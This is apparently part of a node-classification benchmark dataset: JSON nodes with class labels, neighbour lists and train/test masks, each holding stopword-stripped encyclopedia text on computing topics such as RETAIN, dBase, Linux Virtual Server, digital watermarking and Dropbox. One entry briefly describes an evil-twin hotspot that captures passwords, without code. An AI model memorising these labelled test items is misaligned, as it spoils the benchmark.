    "text": "RETAIN:retain retain mainframe based database system accessed via ibm 3270 terminals likely emulators used internally within ibm providing service support ibm field personnel customers acronym retain stands remote technical assistance information network historically two different similar systems called retain first dating mid-1960s system provided technical information people ibm field engineering division form short bulletins tips organized according machine type number software according software component id number information accessible using simple query commands ibm service branch office terminals terminals supported early retain system typewriter-type terminals ibm 2740 terminals also used access ibm field instruction system fis provided education form programmed instruction courseware retain system built software framework fis fact early support retain actually written language course system primarily used provide field support system/360 family mainframe systems although used also disseminate technical information older systems 1970 concurrent announcement system/370 next generation mainframes system/360 new system announced called retain/370 system designed use special technical support centers located regional centers rather branch office new system designed support display terminals rather old typewriter-based ones special version 2915 display originally designed airline reservations systems sabre used 2915 small keyboard-display driven large electronic controller data interchange unit ibm 2948 2948 supported 31 display terminals located within hundred feet cost display system large controller prevented 2915 terminals utilized branch offices thus use regional support centers system older retain system continued used several years afterwards running parallel retain/370 still providing direct support branch-office terminals sometimes called retain/360 system although designation never formalized time retain/370 became available via 3270 terminals branch offices old retain system phased retain/370 renamed simply retain retain/370 ran special applications designed technical support center use powerful feature full-text search engine enabling text documents system retrieved using boolean search requests similar concept full-text search engines use today internet google altavista although limited searching individual words combinations words without reference word-adjacency retain/370 first ibm system deployed large scale capability search engine component retain called iris interpretive retrieval information system confused non-ibm software systems name ... ibm never sold search engine product trademark issue mid-1970s retain expanded permit multiple copies database hosted geographically distributed systems retain custom-built data bank manager served foundation retain applications iris search engine modified support mirroring file updates take place automatically across network manner nearly invisible application programs providing high level data integrity change retain hosts created two us locations two europe two south america two japan applications developed ibm programmers raleigh nc moved boulder colorado 1976 work done north harbour uk registered users system numbered thousands 60 countries time system/370 announced along corresponding retain/370 system ibm announced new family computers would equipped permit remote diagnosis hardware problems system/370 installation model 145 telecommunications adapter included capable used remote support hardware diagnostic programs written allow control via remote connection applications retain system could controlled ibm specialists located ibm support center chicago managed paul rushton also including original plant manufacture cpu form support dubbed data link hardware connection made communications device called ibm 2955 adapter stripped-down variant 2701 communications controller could connect 600 bit/s retain system run diagnostics mainly run mostly diagnostics could run locally ibm ce time specialized applications developed programs analyze logouts generated hardware malfunctions i.e machine check interruptions time concept remote support extended software well 1973 1974 special application mvs system could connected via retain ibm support center memory dumps system data could examined remotely application also permitted download software fixes ibm program temporary fixes although 2955 supported 6-bit character code similar 2740 terminal binary transfer memory dump software updates accomplished protocol similar base-64 encoding scheme used today internet email attachments years several projects aimed supplant retain functionality shown lasting presence despite",
    "neighbors": [
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 4614,
    "label": 1,
    "text": "DBase:dbase dbase also stylized dbase one first database management systems microcomputers successful day dbase system includes core database engine query system forms engine programming language ties components together dbase underlying file format file widely used applications needing simple format store structured data dbase originally published ashton-tate microcomputer operating system cp/m 1980 later ported apple ii ibm pc computers running dos pc platform particular dbase became one best-selling software titles number years major upgrade released dbase iii ported wider variety platforms adding unix vms mid-1980s ashton-tate one big three software publishers early business software market others lotus development wordperfect starting mid-1980s several companies produced variations dbase product especially dbase programming language included foxbase+ later renamed foxpro clipper so-called xbase products many technically stronger dbase could push aside market changed disastrous introduction dbase iv whose design stability poor many users switched products time growing use ibm-invented sql structured query language database products another factor user adoption microsoft windows desktop computers shift toward sql windows put pressure makers xbase products invest major redesign provide new capabilities early 1990s xbase products constituted leading database platform implementing business applications size impact xbase market go unnoticed within one year three top xbase firms acquired larger software companies following decade original xbase products faded prominence several disappeared products known dbase still exist owned dbase llc late 1960s fred thompson jet propulsion laboratory jpl using tymshare product named retrieve manage database electronic calculators time expensive products 1971 thompson collaborated jack hatfield programmer jpl write enhanced version retrieve became jpldis project jpldis written fortran univac 1108 mainframe presented publicly 1973 hatfield left jpl 1974 jeb long took role working jpl contractor c. wayne ratliff entered office football pool interest game felt could win pool processing post-game statistics found newspapers order turned attention database system chance came across documentation jpldis used basis port ptdos kit-built imsai 8080 microcomputer called resulting system vulcan mr. spock star trek george tate hal lashlee built two successful start-up companies discount software one first sell pc software programs mail consumers software distributors one first wholesale distributors pc software world entered agreement ratliff market vulcan formed ashton-tate name ashton chosen purely marketing reasons ratliff ported vulcan ptdos cp/m hal pawluk handled marketing nascent company decided change name business-like dbase pawluk devised use lower case all-caps base create distinctive name pawluk suggested calling new product version two ii suggest less buggy initial release dbase ii result became standard cp/m application along wordstar supercalc 1981 ibm commissioned port dbase then-in-development pc resultant program one initial pieces software available ibm pc went sale fall 1981. dbase one professional programs platform time became huge success customer base included end-users increasing number value added resellers vars purchased dbase wrote applications sold completed systems customers may 1983 release dbase ii runtime entrenched dbase var market allowing vars deploy products using lower-cost runtime system although critics stated dbase difficult learn success created many opportunities third parties 1984 1,000 companies offered dbase-related application development libraries code add functionality applications using dbase ii runtime consulting training how-to books company san diego today known advisor media premiered magazine devoted professional use dbase data based advisor circulation exceeded 35,000 eight months activities fueled rapid rise dbase leading product type adam b green helped popularize dbase ii via legal difficulties ashton-tate publisher dbase ii software platforms operating systems proliferated early 1980s company found difficult port assembly language-based dbase target systems led re-write platform c programming language using automated code conversion tools resulting code worked essentially undocumented inhuman syntax problem would prove serious future resulting dbase iii released may 1984 although reviewers widely panned lowered performance product otherwise well reviewed rapid upgrades system stabilized best-seller throughout 1980s formed famous application trio pc compatibles dbase lotus 123 wordperfect fall 1984 company 500 employees taking 40 million year sales vast majority dbase products introduced 1988 delays dbase iv 300 new improved features foxpro made inroads even dbase iv support query example sql enough five years later top 3 implementations dbase language bought microsoft borland computer associates version called dbase plus 8 released used build ... web ... server-based applications along way borland bought ashton tate brought revised dbase iv 1992 focus described designed programmers rather ordinary users handling data dbase provided detailed procedural commands functions dbase application development language integrated navigational database management system ashton-tate labeled relational meet criteria defined dr. edgar f. codd relational model used runtime interpreter architecture allowed user execute commands typing command line dot prompt similarly program scripts text files prg extensions ran interpreter command dbase programs easy write test business person programming experience could develop applications time ashton-tate competitors introduced so-called clone products compilers robust programming features user-defined functions udfs arrays complex data handling ashton-tate competitors also began incorporate sql ansi/iso standard language creating modifying retrieving data stored relational database management systems eventually became clear dbase world expanded far beyond ashton-tate third-party community formed consisting fox software nantucket alpha software data based advisor magazine sbt application development firms major developer groups paperback software launched flexible fast vp-info unique built-in compiler community dbase variants sought create dbase language standard supported ieee committee x3j19 initiative ieee 1192 said xbase distinguish ashton-tate product a-t saw rise xbase illegal threat proprietary technology 1988 filed suit fox software santa cruz operation sco copying dbase structure sequence foxbase+ sco marketed xenix unix versions fox products december 1990 u.s. district judge terry hatter jr. dismissed ashton-tate lawsuit invalidated ashton-tate copyrights disclosing dbase based part public domain jpldis october 1991 case still appeal borland international acquired ashton-tate one merger provisions u.s. justice department required borland end lawsuit fox allow companies use dbase/xbase language without threat legal action end 1992 major software companies raised stakes acquiring leading xbase products borland acquired ashton-tate dbase products later wordtech xbase products microsoft acquired fox software foxbase+ foxpro products computer associates acquired nantucket clipper products advisor media built data based advisor magazine launching foxpro advisor clipper advisor developer magazines journals live conferences developers however planned dbase advisor magazine aborted due market failure dbase iv year 2000 xbase market faded developers shifted new database systems programming languages computer associates later known ca eventually dropped clipper borland restructured sold dbase major acquirers microsoft stuck xbase longest evolving foxpro visual foxpro product longer offered 2006 advisor media stopped last-surviving xbase magazine foxpro advisor era xbase dominance ended still xbase products dbase product line owned dbase llc currently sells dbase™ plus 12.3 dos-based dbase classic™ dbdos™ run 64-bit windows open source implementations available harbour xharbour also clip 2015 new member xbase family born xsharp x language open source project compiler ide well microsoft visual studio integration xsharp produces .net assemblies uses familiar xbase language xsharp product created group four enthusiasts worked vulcan.net project past compiler created top roslyn compiler code code behind c vb compilers microsoft today implementations dbase language expanded include many features targeted business applications including object-oriented programming manipulation remote distributed data via sql internet functionality interaction modern devices following example opens employee table empl gives every manager supervises 1 employees 10-percent raise prints names salaries note one keep mentioning table name assumed current table stays told otherwise origins interpreted interactive language dbase used variety contextual techniques reduce amount typing needed facilitated incremental interactive development also made larger-scale modular programming difficult tenet modular programming correct execution program module must affected external factors state memory variables tables manipulated program modules dbase designed mind developers careful porting borrowing programming code assumed certain context would make writing larger-scale modular code difficult work-area-specific references still possible using arrow notation b- customer multiple tables could manipulated time addition developer foresight name tables appropriately could clearly refer large number tables open time notation employee- salary vacation- start_date alternatively alias command could appended initial opening table statement made referencing table field unambiguous simple example one open table assign alias fashion use emp alias employee henceforth refer table variables employee- name another notable feature re-use clauses different commands example clause limits scope given command somewhat comparable sql clause different commands list delete replace browse etc could accept clause limit filter scope activity simplifies learning language dbase also one first business-oriented languages implement string evaluation tells interpreter evaluate string stored mymacro programming code example feature made dbase programming flexible dynamic sometimes called meta ability profession could allow programming expressions placed inside tables somewhat reminiscent formulas spreadsheet software however could also problematic pre-compiling making programming code secure hacking dbase tended used custom internal applications small medium companies lack protection copying compared compiled software often less issue addition dot-prompt dbase iii iii+ dbase iv came packaged assist application manipulate data queries well appsgen application allowed user generate applications without resorting code writing like 4gl dbase iv appsgen tool based largely portions early cp/m product named personal pearl although language fallen favor primary business language find dbase excellent interactive ad-hoc data manipulation tool whereas sql retrieves data sets relational database rdbms dbase one easily manipulate format analyze perform calculations individual records strings numbers step-by-step imperative procedural way instead trying figure use sql declarative operations granularity operations generally smaller sql making easier split querying table processing easy-to-understand easy-to-test parts example one could insert browse operation filtering aggregation step study intermediate table view applied filter aggregation step applied application development platform dbase fills gap lower-level languages c c++ java high-level proprietary 4gls fourth generation languages purely visual tools providing relative ease-of-use business people less formal programming skill high productivity professional developers willing trade low-level control dbase remained popular teaching tool even sales slowed text-oriented commands easier present printed training material mouse-oriented competitors mouse-oriented commands added product time command language remained popular de facto standard mousing commands tended vendor-specific major legacy dbase file format adopted number applications example shapefile format developed esri spatial data pc arcinfo geographic information system uses .dbf files store feature attribute data microsoft recommends saving microsoft works database file dbase file format read microsoft excel package available emacs read xbase files libreoffice openoffice calc read write generic dbf files dbase database system one first provide header section describing structure data file meant program longer required advance knowledge data structure rather could ask data file structured several variations .dbf file structure dbase-related products .dbf file structures compatible vp-info unique read variants dbf file structure second filetype file format memo fields character fields limited 254 characters memo field 10-byte pointer file include much larger text field dbase limited ability process memo fields xbase languages clipper treated memo fields strings like character fields purposes except permanent storage dbase uses files single indexes multiple-index files holding 1 48 indexes xbase languages vp-info include compatibility files others use different file formats used clipper used foxpro flagship later iterations clipper included drivers indexes jerry pournelle july 1980 called vulcan infuriatingly excellent software powerful documentation poor praised speed sophisticated queries said lot pounding table screaming rage documentation movie office space character peter gibbons programmer played ron livingston working make company systems y2k compliant bookshelf book understanding dbase iii plus alan simpson clearly seen",
    "neighbors": [
      9345,
      6147,
      2183,
      8458,
      6797,
      10899,
      5374,
      10921,
      1324,
      10413,
      10286,
      7983,
      9397,
      9782,
      4409,
      10692,
      6085,
      8262,
      9286,
      10824,
      8393,
      4042,
      9166,
      10193,
      2903,
      9177,
      477,
      6112,
      7523,
      3556,
      6631,
      6378,
      3435,
      2929,
      11635,
      4598,
      7032,
      2045,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4615,
    "label": 2,
    "text": "DiskImageMounter:diskimagemounter diskimagemounter utility handles mounting disk volume images mac os x starting version 10.3 diskimagemounter works either launching daemon handle disk image contacting running dæmon mount disk like bomarchivehelper diskimagemounter gui double-clicked nothing gui program ever displays window progress bar mount options cancel skip verification error report could mount image found /system/library/coreservices/diskimagemounter.app starting version 10.7 apple removed double-click support images using legacy metadata diskimagemounter able open .img ndif .smi self mounting .dc42 disk copy 4.2 .dart dart disk image formats previously supported version 10.6 earlier diskimagemounter supports variety disk image file types",
    "neighbors": [
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      10857,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7379,
      9430,
      3289,
      4318,
      231,
      9451,
      10476,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      11568,
      3889,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      451,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 4616,
    "label": 3,
    "text": "Linux_Virtual_Server:linux virtual server linux virtual server lvs load balancing software linux kernel–based operating systems lvs free open-source project started wensong zhang may 1998 subject requirements gnu general public license gpl version 2 mission project build high-performance highly available server linux using clustering technology provides good scalability reliability serviceability major work lvs project develop advanced ip load balancing software ipvs application-level load balancing software ktcpvs cluster management components lvs used building highly scalable highly available network services web email media voip services integrating scalable network services large-scale reliable e-commerce e-government applications lvs-based solutions already deployed many real applications throughout world including wikipedia lvs components depend upon linux netfilter framework source code available codice_1 subdirectory within linux kernel source lvs able handle udp tcp layer-4 protocols well ftp passive connection inspecting layer-7 packets provides hierarchy counters codice_2 directory userland utility program used configure lvs called ipvsadm requires superuser privileges run lvs implements several balancing schedulers listed relevant source files commonly used terms include following setting virtual http server two real servers ipvsadm -a -t 192.168.0.1:80 -s rr ipvsadm -a -t 192.168.0.1:80 -r 172.16.0.1:80 -m ipvsadm -a -t 192.168.0.1:80 -r 172.16.0.2:80 -m first command assigns tcp port 80 ip address 192.168.0.1 virtual server chosen scheduling algorithm load balancing round-robin codice_13 second third commands adding ip addresses real servers lvs setup forwarded network packets shall masked codice_14 querying status configured lvs setup ip virtual server version 1.0.8 size=65536 prot localaddress port scheduler flags tcp 192.168.0.1:80 rr",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      6213,
      8268,
      5222,
      10856,
      118,
      4734,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10924,
      10933,
      5815,
      700,
      4797,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      3927,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4617,
    "label": 4,
    "text": "Digital_watermarking:digital watermarking digital watermark kind marker covertly embedded noise-tolerant signal audio video image data typically used identify ownership copyright signal watermarking process hiding digital information carrier signal hidden information need contain relation carrier signal digital watermarks may used verify authenticity integrity carrier signal show identity owners prominently used tracing copyright infringements banknote authentication like traditional physical watermarks digital watermarks often perceptible certain conditions i.e using algorithm digital watermark distorts carrier signal way becomes easily perceivable may considered less effective depending purpose traditional watermarks may applied visible media like images video whereas digital watermarking signal may audio pictures video texts 3d models signal may carry several different watermarks time unlike metadata added carrier signal digital watermark change size carrier signal needed properties digital watermark depend use case applied marking media files copyright information digital watermark rather robust modifications applied carrier signal instead integrity ensured fragile watermark would applied steganography digital watermarking employ steganographic techniques embed data covertly noisy signals steganography aims imperceptibility human senses digital watermarking tries control robustness top priority since digital copy data original digital watermarking passive protection tool marks data degrade control access data one application digital watermarking source tracking watermark embedded digital signal point distribution copy work found later watermark may retrieved copy source distribution known technique reportedly used detect source illegally copied movies term digital watermark coined andrew tirkel charles osborne december 1992 first successful embedding extraction steganographic spread spectrum watermark demonstrated 1993 andrew tirkel charles osborne gerard rankin watermarks identification marks produced paper making process first watermarks appeared italy 13th century use rapidly spread across europe used means identify paper maker trade guild manufactured paper marks often created wire sewn onto paper mold watermarks continue used today manufacturer marks prevent forgery digital watermarking may used wide range applications information embedded signal called digital watermark although contexts phrase digital watermark means difference watermarked signal cover signal signal watermark embedded called host signal watermarking system usually divided three distinct steps embedding attack detection embedding algorithm accepts host data embedded produces watermarked signal watermarked digital signal transmitted stored usually transmitted another person person makes modification called attack modification may malicious term attack arises copyright protection application third parties may attempt remove digital watermark modification many possible modifications example lossy compression data resolution diminished cropping image video intentionally adding noise detection often called extraction algorithm applied attacked signal attempt extract watermark signal unmodified transmission watermark still present may extracted robust digital watermarking applications extraction algorithm able produce watermark correctly even modifications strong fragile digital watermarking extraction algorithm fail change made signal digital watermark called robust respect transformations embedded information may detected reliably marked signal even degraded number transformations typical image degradations jpeg compression rotation cropping additive noise quantization video content temporal modifications mpeg compression often added list digital watermark called imperceptible watermarked content perceptually equivalent original unwatermarked content general easy create either robust watermarks—or—imperceptible watermarks creation robust—and—imperceptible watermarks proven quite challenging robust imperceptible watermarks proposed tool protection digital content example embedded no-copy-allowed flag professional video content digital watermarking techniques may classified several ways digital watermark called fragile fails detectable slightest modification fragile watermarks commonly used tamper detection integrity proof modifications original work clearly noticeable commonly referred watermarks generalized barcodes digital watermark called semi-fragile resists benign transformations fails detection malignant transformations semi-fragile watermarks commonly used detect malignant transformations digital watermark called robust resists designated class transformations robust watermarks may used copy protection applications carry copy access control information digital watermark called imperceptible original cover signal marked signal perceptually indistinguishable digital watermark called perceptible presence marked signal noticeable e.g digital on-screen graphics like network logo content bug codes opaque images videos images made transparent/translucent convenience consumers due fact block portion view therefore degrading confused perceptual watermarking uses limitations human perception imperceptible length embedded message determines two different main classes digital watermarking schemes digital watermarking method referred spread-spectrum marked signal obtained additive modification spread-spectrum watermarks known modestly robust also low information capacity due host interference digital watermarking method said quantization type marked signal obtained quantization quantization watermarks suffer low robustness high information capacity due rejection host interference digital watermarking method referred amplitude modulation marked signal embedded additive modification similar spread spectrum method particularly embedded spatial domain evaluation digital watermarking schemes may provide detailed information watermark designer end-users therefore different evaluation strategies exist often used watermark designer evaluation single properties show example improvement mostly end-users interested detailed information want know given digital watermarking algorithm may used application scenario parameter sets seems best epson kodak produced cameras security features epson photopc 3000z kodak dc-290 cameras added irremovable features pictures distorted original image making unacceptable applications forensic evidence court according blythe fridrich n either camera provide undisputable proof image origin author secure digital camera sdc proposed saraju mohanty et al 2003 published january 2004 first time proposed blythe fridrich also worked sdc 2004 digital camera would use lossless watermarking embed biometric identifier together cryptographic hash reversible data hiding technique enables images authenticated restored original form removing digital watermark replacing image data overwritten would make images acceptable legal purposes us army also interested technique authentication reconnaissance images digital watermarking relational databases emerged candidate solution provide copyright protection tamper detection traitor tracing maintaining integrity relational data many watermarking techniques proposed literature address purposes survey current state-of-the-art classification different techniques according intent way express watermark cover type granularity level verifiability published 2010 halder et al journal universal computer science..",
    "neighbors": [
      9286,
      11215,
      402,
      6324,
      10582,
      223
    ],
    "mask": "Test"
  },
  {
    "node_id": 4618,
    "label": 7,
    "text": "Douglas_Parkhill:douglas parkhill douglas f. parkhill canadian technologist former research minister best known pioneering work called cloud computing work canada telidon videotex project started working canadian ministry communications part department trade industry 1969 previously worked mitre corporation responsible many activities communications satellites computer communications command control systems telecommunications winner treasury board canada secretariat outstanding achievement award 1982 conestoga shield services government industry computer communications research development touche ross award telidon development author several publications including 1966 book challenge computer utility book parkhill thoroughly explored many modern-day characteristics cloud computing elastic provisioning utility service well comparison electricity industry use public private government community forms book mckinsey foundation award distinguished contributions management literature worked dave godfrey canadian writer novelist later book gutenberg two social political meaning computer technology charge research federal department communications time department funding development telidon videotext system heavily involved promoting system overall control program radio broadcast 1980 outlined potential system financial information theatre reservations ability pay print tickets system later documented history telidon project history videotex general",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 4619,
    "label": 9,
    "text": "John_Wainwright_(computer_scientist):john wainwright computer scientist john wainwright computer scientist born australia pioneered development pure object-based computer languages principal architect two computer languages scriptx 1992–1996 maxscript 1996 1992 wainwright sold apple computer structural framework object based language virtual machine operating system called objects c. became lead architect scriptx language media player developed kaleida labs kaleida labs closed doors 1996 wainwright went serve principal architect maxscript scripting language autodesk 3ds max language used game development part maxis sims animation processing pipeline compared scriptx maxscript explicit syntax support 3d animation wainwright chief technology officer crowd science online advertising technology company co-founded 2007 nephew john martin paul neto crowd science funded granite ventures wainwright also first non-employee amazon.com customer ordering book fluid concepts creative analogies amazon building named",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4620,
    "label": 4,
    "text": "Snarfing:snarfing snarf term used computer programmers meaning grab large document file content data use without author owner permission unix community term means acquisition file set files across network also refers using command line tools transfer files http gopher finger ftp protocols without user interaction method achieving cache coherence multiprocessing computer architecture observation writes cached data example snarf evil twin attack using simple shell script running software like airsnarf create wireless hotspot complete captive portal wireless clients associate snarf access point receive ip dns gateway appear completely normal users dns queries resolve attacker ip number regardless dns settings website attempt visit bring snarf splash page requesting username password username password entered unsuspecting users mailed root localhost reason works",
    "neighbors": [
      9968,
      6866,
      7364,
      10727
    ],
    "mask": "Test"
  },
  {
    "node_id": 4621,
    "label": 7,
    "text": "Appirio:appirio appirio wipro company information technology consulting company headquartered indianapolis indiana united states offers technology professional services companies wishing adopt public cloud applications includes software-as-a-service platform-as-a-service technologies like salesforce.com google apps appirio founded chris barbin former borland software cio narinder singh glenn weinstein mike ’ brien 2006 2007 appirio established headquarters salesforce.com ’ startup incubator san mateo california 2012 appirio moved headquarters san francisco california august 2015 appirio announced indianapolis office would named company headquarters early 2008 appirio secured series investment 1.1 million salesforce.com angel investors firm next secured 5.6 million series b funding sequoia capital july 2008 series c round came february 2009 10 million funding sequoia capital ggv capital series funding round 60 million followed march 2012 led private equity firm general atlantic october 2009 appirio chief architect jason ouellette released book titled development force.com platform building business applications cloud released addison-wesley professional april 2010 appirio named ondemand company year alwayson selected best place work bay area san francisco business times listed gartner cloud computing/saas integration july 2010 appirio featured new polymath profiles compound-technology innovations technology novel written vinnie mirchandani march 2011 appirio acquired infowelders salesforce consultancy based louisville ky december 2011 appirio acquired saaspoint provider cloud consulting services europe november 2012 went acquire knowledge infusion human resources talent management advisory consulting services firm september 2013 appirio acquired topcoder community 500,000 developers engineers designers find collaborate software development assignments ranging applications websites back-end corporate systems cloudspokes appirio competing platform 75,000 users merged topcoder january 2014 appirio currently headquartered indianapolis satellite offices san francisco california minato tokyo japan london uk dublin ireland sydney australia espoo finland stockholm sweden porto portugal pune bangalore greater noida hyderabad jaipur india appirio runs serverless company utilizing public cloud solutions in-house datacenter 20 october 2016 appirio announced acquired wipro indian information technology services corporation based bangalore india 500 million appirio ranks among firms like acumen solutions bluewolf acquired ibm cloud sherpas acquired accenture market cloud computing solutions increasingly appirio found primary competitor global system integrators accenture deloitte",
    "neighbors": [
      7489,
      4194,
      10090,
      3323,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 4622,
    "label": 7,
    "text": "Single-chip_Cloud_Computer:single-chip cloud computer single-chip cloud computer scc computer processor cpu created intel corporation 2009 48 distinct physical cores communicate architecture similar cloud computer data center cores part processor carry instructions code allow computer run scc product project started intel research multi-core processors parallel processing multiple calculations additionally intel wanted experiment incorporating designs architecture huge cloud computer data centers cloud computing single processing chip took aspect cloud computing many remote servers communicate applied microprocessor new concept intel wanted experiment name single-chip cloud computer originated concept scc currently still used research purposes currently run simple linux operating system chip boot windows applications scc web servers data informatics bioinformatics financial analytics intel developed new chip architecture based huge cloud data centers cores separated across chip able directly communicate chip contains 48 p54c pentium cores connected 4×6 2d-mesh mesh group 24 tiles set four rows six columns tile contained two cores 16 kb 8 per core message passing buffer mpb shared two cores essentially router router allows core communicate previously cores send information back main memory would re-routed cores scc contains 1.3 billion 45 nanometers nm long transistors amplify signals act switch turn core pairs transistors use anywhere 25 125 watts power depending processing demand comparison intel i7 processor uses 156 watts power four ddr3 memory controllers chip connected 2d-mesh well controllers capable addressing 64 gb random-access memory ddr3 memory used help tile communicate others without chip would functional controllers also work transistors control certain tiles turned save power use proper coding implemented pieces put together get functional processor fast powerful energy efficient framework resembling network cloud computers scc comes rcce simple message passing interface provided intel supports basic message buffering operations scc two modes operate processor mode mesh mode processor mode cores executing code system memory programmed i/o inputs outputs system connected system board fpga loading memory configuring processor bootstrapping sustaining initial load currently done software running scc management console embedded chip cores turned routers transistors ram controllers sending receiving large packets data additionally memory map intel plans share technology companies hp yahoo microsoft multiple companies researching scc efficiently quickly advance technology hope make scc scalable 100+ cores one way hope achieve chip able communicate another chip could put two chips together get double cores hope improve parallel programming productivity power management take advantage chip architecture large number cores additionally plan experiment architecture similar chip architectures develop many-core scalable processors maximizes processing power cores power efficient",
    "neighbors": [
      9095,
      5384,
      5029,
      10675,
      1972,
      823,
      6971,
      1085,
      704,
      6730,
      7755,
      2383,
      8795,
      3294,
      225,
      4194,
      9959,
      1776,
      499,
      6911
    ],
    "mask": "Test"
  },
  {
    "node_id": 4623,
    "label": 7,
    "text": "Dropbox_(service):dropbox service dropbox file hosting service operated american company dropbox inc. headquartered san francisco california offers cloud storage file synchronization personal cloud client software dropbox founded 2007 mit students drew houston arash ferdowsi startup company initial funding seed accelerator combinator dropbox praised receiving crunchie award 2010 best internet application macworld 2009 editor choice award software ranked one valuable startups us world valuation us 10 billion described one combinator successful investments date however dropbox also experienced criticism generated controversy issues including security breaches privacy concerns dropbox blocked china since 2014 five star privacy rating electronic frontier foundation dropbox brings files together one central place creating special folder user computer contents folders synchronized dropbox servers computers devices user installed dropbox keeping files up-to-date devices dropbox uses freemium business model users offered free account set storage size paid subscriptions available offer capacity additional features dropbox basic users given two gigabytes free storage space dropbox plus users given two terabytes storage space well additional features including advanced sharing controls remote wipe optional extended version history add-on dropbox offers computer apps microsoft windows apple macos linux computers mobile apps ios android windows phone smartphones tablets march 2013 company acquired mailbox popular email app april 2014 company introduced dropbox carousel photo video gallery app mailbox carousel shut december 2015 key features apps implemented regular dropbox service october 2015 officially announced dropbox paper collaborative document editor reported effort expand operations towards businesses march 2016 dropbox 500 million users dropbox founder drew houston conceived dropbox concept repeatedly forgetting usb flash drive student mit 2009 meet team post dropbox blog wrote existing services time suffered problems internet latency large files bugs made think much began making something personal use realized could benefit others problems houston founded evenflow inc. may 2007 company behind dropbox shortly thereafter secured seed funding combinator dropbox officially launched 2008 techcrunch disrupt annual technology conference owing trademark disputes proxy inc. evenflow dropbox official domain name get dropbox.com october 2009 acquired current domain dropbox.com october 2009 evenflow inc. renamed dropbox inc interview techcrunch founder stories october 2011 houston explained demo video released dropbox early days one viewer arash ferdowsi ferdowsi impressed formed partnership regards competition houston stated easy explain idea actually really hard dropbox seen steady user growth since inception surpassed 1 million registered users milestone april 2009 followed 2 million september 3 million november passed 50 million users october 2011 100 million november 2012 200 million november 2013 400 million june 2015 500 million march 2016 july 2012 dropbox acquired tapengage startup enables advertisers publishers collaborate tablet-optimized advertising following december dropbox acquired two companies audiogalaxy startup allowing users store music files playlists cloud stream device snapjoy company allowed users aggregate archive view digital photos cameras phones popular apps like flickr instagram picasa view online via ios app july 2013 dropbox acquired endorse mobile coupon startup may 2014 dropbox acquired bubbli startup built innovative ways incorporating 3d technology 2d views packaging mobile app january 2015 dropbox acquired cloudon company provided mobile applications document editing creation time dropbox told techcrunch cloudon base herzliya would become first dropbox office israel july dropbox acquired clementine enterprise communication service april 2014 dropbox acquired photo-sharing company loom would shut integrated then-recently announced carousel document-sharing startup hackpad dropbox later announced april 2017 hackpad would shut july 19 notes migrated dropbox paper dropbox computer apps microsoft windows apple macos linux computers mobile apps ios android windows phone smartphones tablets also offers website interface part partnership microsoft dropbox announced universal windows 10 app january 2016 dropbox apps offer automatic photo uploading feature allowing users automatically upload photos videos cameras tablets sd cards smartphones dedicated camera uploads folder dropbox users given 500 megabytes extra space uploading first photo given 3 gigabytes extra space users continue using method photos july 2014 dropbox introduced streaming sync computer apps streaming sync described new supercharged synchronization speed large files improves upload download time 2 times august 2015 dropbox announced availability universal 2nd factor usb security keys providing two-factor authentication logging services dropbox received initial funding seed accelerator combinator dropbox also raised us 1.2 million series funding sequoia capital 2007 along interest amount converted equity part series investment included fresh slug us 6 million bringing total amount us 7.25 million round closed 2008 documents filed 2009 may 2010 report wall street journal said since founder drew houston started reading eric ries lean startup blog year ago company started trickling new features ready instead waiting launch fully featured product helps test customer appetite says dubbing practice minimum viable product techcrunch reported july 2011 dropbox looking raise us 200 us 300 million valuation end 5 billion 10 billion range ... quite step previous funding rounds totalled tiny 7.2 million noted forbes article dropbox revenue track hit 240 million 2011 april 2012 dropbox announced bono edge two members irish rock band u2 individual investors company march 2017 bloomberg reported dropbox secured us 600 million credit line company expected file initial public offering ipo soon year february 2018 dropbox filed ipo listed nasdaq company initial intent raise 500 million dropbox stock rose 42 percent 29.89 first day trading march 23 2018 may 2018 dropbox never profitable reports positive cash flow dropbox uses freemium business model users offered free account set storage size paid subscriptions available offer capacity additional features dropbox basic users given two gigabytes free storage space expanded referrals users recommend service people people start using service user awarded additional 500 megabytes storage space dropbox basic users earn 16 gigabytes referral program dropbox plus subscription named dropbox pro prior march 2017 gives users 2 terabytes storage space well additional features including november 2013 dropbox announced changes dropbox business would enable users connect personal dropbox business dropbox device folders properly labeled personal work come password contacts settings files furthermore dropbox announced shared audit logs remote wipe business administrators account transfers new features business offering january 2017 dropbox introduced smart sync business enterprise customers feature lets windows macos users see files dropbox folder download specific files on-demand similarly dropbox basic dropbox plus users also earn extra space referrals plus users earn 1 gigabyte per referral 32 gigabytes dropbox business dropbox solution corporations adding business-centered functionality teams including collaboration tools advanced security control unlimited file recovery user management granular permissions options unlimited storage large organizations dropbox offers dropbox enterprise highest tier product offerings adding domain management tools assigned dropbox customer support member help expert advisors deployment user training july 2016 dropbox announced new adminx administrator dashboard business customers offering improved control company files users june 2017 adminx dashboard given redesign additional administrator functions log-in durations custom password strength parameters granular 